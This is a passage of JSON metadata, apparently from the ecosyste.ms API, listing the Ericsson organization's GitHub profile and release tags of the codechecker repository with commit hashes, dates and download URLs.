ners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"tags":[{"name":"v6.26.1","sha":"b7810134193a48f9ec33da861b1e308f7ed553b8","kind":"commit","published_at":"2025-07-10T17:42:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1/manifests"},{"name":"v6.26.0","sha":"0bbf351e870c7056cd9cc0dc44a795c0fe805dfa","kind":"commit","published_at":"2025-06-06T23:31:28.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0/manifests"},{"name":"v6.26.0-rc1","sha":"e0b9374245f88450d5b6dc4b164f78d9e2f06cfb","kind":"commit","published_at":"2025-04-28T09:21:09.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1/manifests"},{"name":"v6.25.1","sha":"c63dcdd8aa8dbd47360a0a02234c94e45107fb76","kind":"commit","published_at":"2025-03-12T13:44:01.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1/manifests"},{"name":"v6.25.0","sha":"d1ca304f33f4852275a612c05fc9fa102e34dcaa","kind":"commit","published_at":"2025-03-05T08:55:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0/manifests"},{"name":"v6.24.7","sha":"71f343577e0eea089e53b3bd78dfcb8867403cf3","kind":"commit","published_at":"2025-02-18T10:30:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7/manifests"},{"name":"v6.24.6","sha":"4ce6544bb734faa69fc00023b1477f416541933a","kind":"commit","published_at":"2025-02-17T15:00:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6/manifests"},{"name":"v6.24.5","sha":"5914f3a98336823c3a0a1061d84832ed88822469","kind":"commit","published_at":"2025-01-21T14:55:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5/manifests"},{"name":"v6.25.0-rc1","sha":"920d71089ac661d07670c8b9d5c2dd2cebcafcbd","kind":"commit","published_at":"2024-12-11T08:48:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1/manifests"},{"name":"v6.24.4","sha":"454d978191ed42c8202a2244dc092dfb6fd8c83a","kind":"commit","published_at":"2024-10-25T10:41:35.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4/manifests"},{"name":"v6.24.3","sha":"42074b5e3e3e8c166364b6a618b3795de60c6bbf","kind":"commit","published_at":"2024-10-18T13:35:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3/manifests"},{"name":"v6.24.2","sha":"ad41702e3108e4b92ae5d0143a5b961cc34195eb","kind":"commit","published_at":"2024-10-18T10:18:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2/manifests"},{"name":"v6.24.1","sha":"2cc6285dfd32b786e92239d4038dcdea3abfb63b","kind":"commit","published_at":"2024-09-13T09:33:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1/manifests"},{"name":"v6.24.0","sha":"ea795071d62637c69300f4528b6c46c75b2274bc","kind":"commit","published_at":"2024-06-12T12:29:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0/manifests"},{"name":"v6.24.0-rc1","sha":"f05a9bf97759b133f0729aaf12232c54b46b7c19","kind":"commit","published_at":"2024-04-18T06:33:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1/manifests"},{"name":"v6.23.1","sha":"2a8fa6e711a4ff591280a79fe8798dee2507d984","kind":"commit","published_at":"2023-12-14T14:30:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1/manifests"},{"name":"v6.23.0","sha":"bea15d4fb77478860dee41f6e7f206050720869a","kind":"commit","published_at":"2023-12-08T18:46:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0/manifests"},{"name":"v6.23.0-rc2","sha":"605ba1b9db6ed067c89a12f7055cc177b76f8ed6","kind":"commit","published_at":"2023-11-17T11:24:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2/manifests"},{"name":"v6.23.0-rc1","sha":"848e335ff33e49db1905331424c268d423feb7fc","kind":"commit","published_at":"2023-10-30T14:42:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1/manifests"},{"name":"v6.22.2","sha":"a3d35cfd509b995187288cd8631446415a334257","kind":"commit","published_at":"2023-07-13T14:47:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2/manifests"},{"name":"v6.22.1","sha":"8aabb4f715ed971f5ff9751b438e2ac00016e145","kind":"commit","published_at":"2023-04-19T13:23:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1/manifests"},{"name":"v6.22.0","sha":"ecf377637b86360c75508952b2e43fabac2aec6b","kind":"commit","published_at":"2023-04-14T13:22:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0/manifests"},{"name":"v6.22.0-rc1","sha":"6fc70f69b75ccbe46f537cc817b0cf07ba9c8cd9","kind":"commit","published_at":"2023-03-24T14:34:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1/manifests"},{"name":"v6.21.0","sha":"fe0ac5b291ed3cfef8fd8c6909501de55dabc20e","kind":"commit","published_at":"2022-11-09T17:22:05.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0/manifests"},{"name":"v6.20.0-hotfix5","sha":"e70c682f11af655d6b174a15d596ed913f1cb924","kind":"commit","published_at":"2022-11-04T13:36:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5/manifests"},{"name":"v6.20.0-hotfix4","sha":"cbefae31ba2a4b66944af401da05e85b858a290a","kind":"commit","published_at":"2022-11-03T17:44:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4/manifests"},{"name":"v6.21.0-rc1","sha":"b629fb04a7f05dbbc74aff0616add06ef9b26dd1","kind":"commit","published_at":"2022-10-27T09:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1/manifests"},{"name":"v6.20.0-hotfix3","sha":"49a50a849df44881e7709cb26f7daa2380139359","kind":"commit","published_at":"2022-09-26T17:11:33.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3/manifests"},{"name":"v6.20.0-hotfix2","sha":"b518f9af122c36fc9896a2f1fafe417395e2e82e","kind":"commit","published_at":"2022-09-21T18:46:30.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2/manifests"},{"name":"v6.20.0-hotfix1","sha":"0297574b742ab8186665c3a5d2917fa89245b59f","kind":"commit","published_at":"2022-09-19T17:24:52.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1/manifests"},{"name":"v6.20.0","sha":"7d65d89c2a3fed84f395016d4c9815bab860d0b3","kind":"commit","published_at":"2022-09-15T11:44:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0/manifests"},{"name":"v6.20.0-rc1","sha":"d24c22cd39a9e7a9145c5293843c6450e31862db","kind":"commit","published_at":"2022-08-22T21:27:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1/manifests"},{"name":"v6.19.1-hotfix2","sha":"c0af8d9a42f75f28ccfdc149194e5cc95be14841","kind":"commit","published_at":"2022-07-21T15:16:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2/manifests"},{"name":"v6.19.1-hotfix1","sha":"d564db65a58fc7ef651ab1474a72eadf4c29c55f","kind":"commit","published_at":"2022-07-06T13:28:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1/manifests"},{"name":"v6.19.1","sha":"9fa0f9817f6e91eda2a9202e0a3bf5006accdc8c","kind":"commit","published_at":"2022-03-18T15:09:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1/manifests"},{"name":"v6.19.0-hotfix1","sha":"e262d015068c6b49f92a2afb1a166eb4f4438e84","kind":"commit","published_at":"2022-03-12T13:05:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1/manifests"},{"name":"v6.19.0","sha":"5f5b6b7e7ecd70d23079580c063f4e4f2bb2a7ad","kind":"commit","published_at":"2022-03-10T13:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0/manifests"},{"name":"v6.18.2-hotfix1","sha":"359e88b9339946cba84c00ad32511be8b7fad65d","kind":"commit","published_at":"2022-02-03T09:31:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1/manifests"},{"name":"v6.18.2","sha":"992d274c78b9a0436328c30a40d3b1de899902e2","kind":"commit","published_at":"2022-01-14T14:04:31.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2/manifests"},{"name":"v6.18.1","sha":"fd5f7e04219f947cfda68e9e11f4d3b07f0564a5","kind":"commit","published_at":"2021-12-10T07:28:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1/manifests"},{"name":"v6.18.0-hotfix1","sha":"a46603ab87348ff5e9bf5016fd906e9ef6781eb4","kind":"commit","published_at":"2021-11-18T17:46:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1/manifests"},{"name":"v6.18.0","sha":"153b0e09efc715fd16eee815eecf454f9f79f7f1","kind":"commit","published_at":"2021-11-12T12:51:42.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0/manifests"},{"name":"v6.17.0-hotfix1","sha":"315d4494603b02252966770452e676fd63a67021","kind":"commit","published_at":"2021-10-14T12:22:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0-hotfix1","html_url":"https://github.co